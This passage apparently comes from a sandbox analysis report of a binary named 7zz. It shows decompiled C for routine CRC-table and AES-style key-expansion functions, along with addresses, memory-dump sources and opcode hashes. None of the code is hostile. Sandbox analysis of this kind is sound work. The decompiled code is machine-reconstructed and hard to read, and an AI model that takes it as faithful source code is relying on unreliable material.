!((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) >> 0x1) >> 0x1) >> 0x1) >> 0x1;
					asm("adc esi, 0xffffffff");
					_t64 = ( !0x00000000 << 0x00000020 | _t63) >> 1;
					 *(0x495a20 + _t114 * 8) =  !((_t63 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ _t64;
					 *((intOrPtr*)(0x495a24 + _t114 * 8)) = 0x928828;
					_t114 = _t114 + 1;
				} while (_t114 < 0x100);
				return _t64;
			}






                                                                                                                                    0x00467e82
                                                                                                                                    0x00467e84
                                                                                                                                    0x00467e90
                                                                                                                                    0x00467eb8
                                                                                                                                    0x00467edf
                                                                                                                                    0x00467f05
                                                                                                                                    0x00467f2c
                                                                                                                                    0x00467f52
                                                                                                                                    0x00467f79
                                                                                                                                    0x00467f87
                                                                                                                                    0x00467f9f
                                                                                                                                    0x00467fa2
                                                                                                                                    0x00467fbc
                                                                                                                                    0x00467fc3
                                                                                                                                    0x00467fca
                                                                                                                                    0x00467fcb
                                                                                                                                    0x00467fd9

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 23c8aaa3664de804fa2ce29b316b560c6082957a249a83d654323075b2432b7d
                                                                                                                                    • Instruction ID: 58285889abc0c4558893f753c2962dba04340085c6fb08ee3641d5c85bffa47e
                                                                                                                                    • Opcode Fuzzy Hash: 23c8aaa3664de804fa2ce29b316b560c6082957a249a83d654323075b2432b7d
                                                                                                                                    • Instruction Fuzzy Hash: 92318C7BE75C3402E388883ACC233A7504397D5734B6ED3797C76EA2D9EDAD98810194
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0046A2A0 Relevance: .1, Instructions: 95COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0046A2A0(signed int* __edx) {
				signed int _t35;
				signed int _t37;
				signed int _t38;
				signed int* _t39;
				signed int* _t40;
				unsigned int _t47;
				signed int _t48;
				signed int* _t49;
				signed int* _t50;
				signed int _t54;
				signed int _t77;
				signed int _t85;
				unsigned int _t86;
				void* _t94;

				_t50 = __edx;
				_t47 =  *(_t94 + 0xc);
				_t86 = _t47 + 0x1c;
				_t48 = _t47 >> 2;
				_t35 = (_t48 >> 1) + 3;
				_t85 = 0;
				 *(_t94 + 0xc) = _t86;
				 *_t49 = _t35;
				if(_t48 == 0) {
					L2:
					if(_t85 >= _t86) {
						return _t35;
					}
					 *((intOrPtr*)(_t94 + 0x14)) = _t49 + 0x10 + (_t85 - _t48) * 4;
					do {
						_t37 = _t85;
						_t38 = _t37 / _t48;
						_t54 = _t37 % _t48;
						_t77 =  *(_t49 + 0xc + _t85 * 4);
						if(_t54 != 0) {
							if(_t48 > 6 && _t54 == 4) {
								_t77 =  *((_t77 & 0x000000ff) + 0x48dc78) & 0x000000ff | (( *((_t77 >> 0x00000010 & 0x000000ff) + 0x48dc78) & 0x000000ff | ( *((_t77 >> 0x18) + 0x48dc78) & 0x000000ff) << 0x00000008) << 0x00000008 |  *((_t77 >> 0x00000008 & 0x000000ff) + 0x48dc78) & 0x000000ff) << 0x00000008;
							}
						} else {
							_t18 = _t38 + 0x48dd78; // 0x8040201
							_t86 =  *(_t94 + 0x10);
							_t77 =  *((_t77 >> 0x00000008 & 0x000000ff) + 0x48dc78) & 0x000000ff ^  *_t18 & 0x000000ff | ((( *((_t77 & 0x000000ff) + 0x48dc78) & 0x000000ff) << 0x00000008 |  *((_t77 >> 0x18) + 0x48dc78) & 0x000000ff) << 0x00000008 |  *((_t77 >> 0x00000010 & 0x000000ff) + 0x48dc78) & 0x000000ff) << 0x00000008;
						}
						_t39 =  *(_t94 + 0x18);
						 *(_t49 + 0x10 + _t85 * 4) =  *_t39 ^ _t77;
						_t85 = _t85 + 1;
						_t40 =  &(_t39[1]);
						 *(_t94 + 0x18) = _t40;
					} while (_t85 < _t86);
					return _t40;
				} else {
					goto L1;
				}
				do {
					L1:
					_t35 =  *_t50;
					 *(_t49 + 0x10 + _t85 * 4) = _t35;
					_t85 = _t85 + 1;
					_t50 =  &(_t50[1]);
				} while (_t85 < _t48);
				goto L2;
			}

















                                                                                                                                    0x0046a2a0
                                                                                                                                    0x0046a2a2
                                                                                                                                    0x0046a2a7
                                                                                                                                    0x0046a2aa
                                                                                                                                    0x0046a2b2
                                                                                                                                    0x0046a2b5
                                                                                                                                    0x0046a2b7
                                                                                                                                    0x0046a2bb
                                                                                                                                    0x0046a2bf
                                                                                                                                    0x0046a2cf
                                                                                                                                    0x0046a2d1
                                                                                                                                    0x0046a3c4
                                                                                                                                    0x0046a3c4
                                                                                                                                    0x0046a2df
                                                                                                                                    0x0046a2e4
                                                                                                                                    0x0046a2e6
                                                                                                                                    0x0046a2e8
                                                                                                                                    0x0046a2e8
                                                                                                                                    0x0046a2ea
                                                                                                                                    0x0046a2f0
                                                                                                                                    0x0046a350
                                                                                                                                    0x0046a3a1
                                                                                                                                    0x0046a3a1
                                                                                                                                    0x0046a2f2
                                                                                                                                    0x0046a2f2
                                                                                                                                    0x0046a340
                                                                                                                                    0x0046a349
                                                                                                                                    0x0046a349
                                                                                                                                    0x0046a3a3
                                                                                                                                    0x0046a3ab
                                                                                                                                    0x0046a3af
                                                                                                                                    0x0046a3b0
                                                                                                                                    0x0046a3b3
                                                                                                                                    0x0046a3b7
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0046a2c1
                                                                                                                                    0x0046a2c1
                                                                                                                                    0x0046a2c1
                                                                                                                                    0x0046a2c3
                                                                                                                                    0x0046a2c7
                                                                                                                                    0x0046a2c8
                                                                                                                                    0x0046a2cb
                                                                                                                                    0x00000000

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d9ad90c045aee2e314f446bae37fd2ae8d495a05db838e50cc6b87b586cac8e5
                                                                                                                                    • Instruction ID: 55640d85d086321eab8c1dde6dfc87ccde0e417aff073f041b781c99bee8189f
                                                                                                                                    • Opcode Fuzzy Hash: d9ad90c045aee2e314f446bae37fd2ae8d495a05db838e50cc6b87b586cac8e5
                                                                                                                                    • Instruction Fuzzy Hash: 86314DB1E046B606F3109E3F8C4012AB7D3AFC2211F18C6BAE5954B78AEA359592C756
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00459E70 Relevance: .1, Instructions: 74COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00459E70(void* __ecx) {
				signed int _t35;
				signed int _t36;
				void* _t37;
				unsigned int _t67;
				signed int* _t68;

				_t37 = __ecx;
				_t67 = 0;
				 *((intOrPtr*)(__ecx + 0x30)) = 0;
				 *((intOrPtr*)(__ecx + 0x4c)) = 0;
				 *((intOrPtr*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0x20;
				 *((intOrPtr*)(__ecx + 0x54)) = 1;
				 *((intOrPtr*)(__ecx + 0x48)) = 4;
				 *((intOrPtr*)(__ecx + 0x58)) = 0;
				_t8 = _t37 + 0x70; // 0x80
				_t68 = _t8;
				do {
					_t35 =  !((( !((( !((( !((( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001;
					_t36 = _t35 >> 1;
					 *_t68 =  !((_t35 & 0x00000001) - 1) & 0xedb88320 ^ _t36;
					_t67 = _t67 + 1;
					_t68 =  &(_t68[1]);
				} while (_t67 < 0x100);
				return _t36;
			}








                                                                                                                                    0x00459e70
                                                                                                                                    0x00459e70
                                                                                                                                    0x00459e73
                                                                                                                                    0x00459e76
                                                                                                                                    0x00459e79
                                                                                                                                    0x00459e7c
                                                                                                                                    0x00459e83
                                                                                                                                    0x00459e8a
                                                                                                                                    0x00459e91
                                                                                                                                    0x00459e94
                                                                                                                                    0x00459e94
                                                                                                                                    0x00459e97
                                                                                                                                    0x00459f11
                                                                                                                                    0x00459f21
                                                                                                                                    0x00459f25
                                                                                                                                    0x00459f27
                                                                                                                                    0x00459f28
                                                                                                                                    0x00459f2b
                                                                                                                                    0x00459f38

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 772e87da75b6b7c62898645b4c777575a3ccfa1faee4ffe1159f4fb115bb9a44
                                                                                                                                    • Instruction ID: c9cb9fdb4045278a2449ae7dde7cf1f47b93b7590a933fb60e95c99ee0c0d7ef
